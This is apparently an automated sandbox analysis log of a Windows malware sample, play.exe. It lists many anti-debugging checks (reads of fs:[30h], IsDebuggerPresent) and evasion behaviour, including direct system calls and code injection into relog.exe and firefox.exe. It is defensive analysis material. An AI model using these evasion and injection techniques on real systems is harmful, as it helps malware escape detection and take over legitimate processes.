Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02698770 mov eax, dword ptr fs:[00000030h] 0_2_02698770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h] 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C674D mov esi, dword ptr fs:[00000030h] 0_2_026C674D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h] 0_2_026C674D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h] 0_2_026C674D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02714755 mov eax, dword ptr fs:[00000030h] 0_2_02714755
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271E75D mov eax, dword ptr fs:[00000030h] 0_2_0271E75D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02690750 mov eax, dword ptr fs:[00000030h] 0_2_02690750
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h] 0_2_026D2750
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h] 0_2_026D2750
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270C730 mov eax, dword ptr fs:[00000030h] 0_2_0270C730
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h] 0_2_026CC720
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h] 0_2_026CC720
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h] 0_2_026C273C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C273C mov ecx, dword ptr fs:[00000030h] 0_2_026C273C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h] 0_2_026C273C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CC700 mov eax, dword ptr fs:[00000030h] 0_2_026CC700
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02690710 mov eax, dword ptr fs:[00000030h] 0_2_02690710
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C0710 mov eax, dword ptr fs:[00000030h] 0_2_026C0710
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h] 0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h] 0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h] 0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271E7E1 mov eax, dword ptr fs:[00000030h] 0_2_0271E7E1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h] 0_2_026947FB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h] 0_2_026947FB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269C7C0 mov eax, dword ptr fs:[00000030h] 0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027107C3 mov eax, dword ptr fs:[00000030h] 0_2_027107C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026907AF mov eax, dword ptr fs:[00000030h] 0_2_026907AF
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027447A0 mov eax, dword ptr fs:[00000030h] 0_2_027447A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273678E mov eax, dword ptr fs:[00000030h] 0_2_0273678E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271C460 mov ecx, dword ptr fs:[00000030h] 0_2_0271C460
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h] 0_2_0268847D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h] 0_2_0268847D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h] 0_2_026BA470
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h] 0_2_026BA470
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h] 0_2_026BA470
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274A456 mov eax, dword ptr fs:[00000030h] 0_2_0274A456
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h] 0_2_026CE443
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B245A mov eax, dword ptr fs:[00000030h] 0_2_026B245A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268645D mov eax, dword ptr fs:[00000030h] 0_2_0268645D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h] 0_2_0268E420
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h] 0_2_0268E420
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h] 0_2_0268E420
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268C427 mov eax, dword ptr fs:[00000030h] 0_2_0268C427
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h] 0_2_02716420
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h] 0_2_026C8402
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026904E5 mov ecx, dword ptr fs:[00000030h] 0_2_026904E5
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271A4B0 mov eax, dword ptr fs:[00000030h] 0_2_0271A4B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026964AB mov eax, dword ptr fs:[00000030h] 0_2_026964AB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C44B0 mov ecx, dword ptr fs:[00000030h] 0_2_026C44B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274A49A mov eax, dword ptr fs:[00000030h] 0_2_0274A49A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h] 0_2_026C656A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02698550 mov eax, dword ptr fs:[00000030h] 0_2_02698550
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h] 0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h] 0_2_026A0535
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02726500 mov eax, dword ptr fs:[00000030h] 0_2_02726500
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h] 0_2_02764500
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CC5ED mov eax, dword ptr fs:[00000030h] 0_2_026CC5ED
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026925E0 mov eax, dword ptr fs:[00000030h] 0_2_026925E0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE5CF mov eax, dword ptr fs:[00000030h] 0_2_026CE5CF
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026965D0 mov eax, dword ptr fs:[00000030h] 0_2_026965D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA5D0 mov eax, dword ptr fs:[00000030h] 0_2_026CA5D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h] 0_2_027105A7
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B45B1 mov eax, dword ptr fs:[00000030h] 0_2_026B45B1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C4588 mov eax, dword ptr fs:[00000030h] 0_2_026C4588
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02692582 mov eax, dword ptr fs:[00000030h] 0_2_02692582
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02692582 mov ecx, dword ptr fs:[00000030h] 0_2_02692582
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE59C mov eax, dword ptr fs:[00000030h] 0_2_026CE59C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270CA72 mov eax, dword ptr fs:[00000030h] 0_2_0270CA72
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h] 0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273EA60 mov eax, dword ptr fs:[00000030h] 0_2_0273EA60
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0A5B mov eax, dword ptr fs:[00000030h] 0_2_026A0A5B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h] 0_2_02696A50
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BEA2E mov eax, dword ptr fs:[00000030h] 0_2_026BEA2E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CCA24 mov eax, dword ptr fs:[00000030h] 0_2_026CCA24
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B4A35 mov eax, dword ptr fs:[00000030h] 0_2_026B4A35
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271CA11 mov eax, dword ptr fs:[00000030h] 0_2_0271CA11
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CAAEE mov eax, dword ptr fs:[00000030h] 0_2_026CAAEE
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h] 0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02690AD0 mov eax, dword ptr fs:[00000030h] 0_2_02690AD0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C4AD0 mov eax, dword ptr fs:[00000030h] 0_2_026C4AD0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02698AA0 mov eax, dword ptr fs:[00000030h] 0_2_02698AA0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026E6AA4 mov eax, dword ptr fs:[00000030h] 0_2_026E6AA4
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h] 0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02764A80 mov eax, dword ptr fs:[00000030h] 0_2_02764A80
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C8A90 mov edx, dword ptr fs:[00000030h] 0_2_026C8A90
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268CB7E mov eax, dword ptr fs:[00000030h] 0_2_0268CB7E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h] 0_2_02762B57
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273EB50 mov eax, dword ptr fs:[00000030h] 0_2_0273EB50
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02738B42 mov eax, dword ptr fs:[00000030h] 0_2_02738B42
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02726B40 mov eax, dword ptr fs:[00000030h] 0_2_02726B40
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275AB40 mov eax, dword ptr fs:[00000030h] 0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02688B50 mov eax, dword ptr fs:[00000030h] 0_2_02688B50
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02744B4B mov eax, dword ptr fs:[00000030h] 0_2_02744B4B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BEB20 mov eax, dword ptr fs:[00000030h] 0_2_026BEB20
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02758B28 mov eax, dword ptr fs:[00000030h] 0_2_02758B28
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h] 0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02764B00 mov eax, dword ptr fs:[00000030h] 0_2_02764B00
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271CBF0 mov eax, dword ptr fs:[00000030h] 0_2_0271CBF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BEBFC mov eax, dword ptr fs:[00000030h] 0_2_026BEBFC
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h] 0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h] 0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273EBD0 mov eax, dword ptr fs:[00000030h] 0_2_0273EBD0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h] 0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02744BB0 mov eax, dword ptr fs:[00000030h] 0_2_02744BB0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0BBE mov eax, dword ptr fs:[00000030h] 0_2_026A0BBE
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02726870 mov eax, dword ptr fs:[00000030h] 0_2_02726870
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271E872 mov eax, dword ptr fs:[00000030h] 0_2_0271E872
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A2840 mov ecx, dword ptr fs:[00000030h] 0_2_026A2840
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02694859 mov eax, dword ptr fs:[00000030h] 0_2_02694859
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C0854 mov eax, dword ptr fs:[00000030h] 0_2_026C0854
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273483A mov eax, dword ptr fs:[00000030h] 0_2_0273483A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA830 mov eax, dword ptr fs:[00000030h] 0_2_026CA830
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h] 0_2_026B2835
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B2835 mov ecx, dword ptr fs:[00000030h] 0_2_026B2835
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h] 0_2_026B2835
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271C810 mov eax, dword ptr fs:[00000030h] 0_2_0271C810
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275A8E4 mov eax, dword ptr fs:[00000030h] 0_2_0275A8E4
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CC8F9 mov eax, dword ptr fs:[00000030h] 0_2_026CC8F9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BE8C0 mov eax, dword ptr fs:[00000030h] 0_2_026BE8C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027608C0 mov eax, dword ptr fs:[00000030h] 0_2_027608C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271C89D mov eax, dword ptr fs:[00000030h] 0_2_0271C89D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02690887 mov eax, dword ptr fs:[00000030h] 0_2_02690887
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h] 0_2_026D096E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D096E mov edx, dword ptr fs:[00000030h] 0_2_026D096E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h] 0_2_026D096E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h] 0_2_026B6962
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02734978 mov eax, dword ptr fs:[00000030h] 0_2_02734978
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271C97C mov eax, dword ptr fs:[00000030h] 0_2_0271C97C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02764940 mov eax, dword ptr fs:[00000030h] 0_2_02764940
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02710946 mov eax, dword ptr fs:[00000030h] 0_2_02710946
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0272892B mov eax, dword ptr fs:[00000030h] 0_2_0272892B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271892A mov eax, dword ptr fs:[00000030h] 0_2_0271892A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271C912 mov eax, dword ptr fs:[00000030h] 0_2_0271C912
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02688918 mov eax, dword ptr fs:[00000030h] 0_2_02688918
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E908 mov eax, dword ptr fs:[00000030h] 0_2_0270E908
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271E9E0 mov eax, dword ptr fs:[00000030h] 0_2_0271E9E0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C29F9 mov eax, dword ptr fs:[00000030h] 0_2_026C29F9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275A9D3 mov eax, dword ptr fs:[00000030h] 0_2_0275A9D3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027269C0 mov eax, dword ptr fs:[00000030h] 0_2_027269C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h] 0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C49D0 mov eax, dword ptr fs:[00000030h] 0_2_026C49D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027189B3 mov esi, dword ptr fs:[00000030h] 0_2_027189B3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027189B3 mov eax, dword ptr fs:[00000030h] 0_2_027189B3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026909AD mov eax, dword ptr fs:[00000030h] 0_2_026909AD
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h] 0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BE70C8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BE8B7B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BE8B7B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtOpenKeyEx: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtQueryValueKey: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtTerminateThread: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\play.exe Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write
Source: C:\Users\user\Desktop\play.exe Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe Thread register set: target process: 7852
Source: C:\Windows\SysWOW64\relog.exe Thread APC queued: target process: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
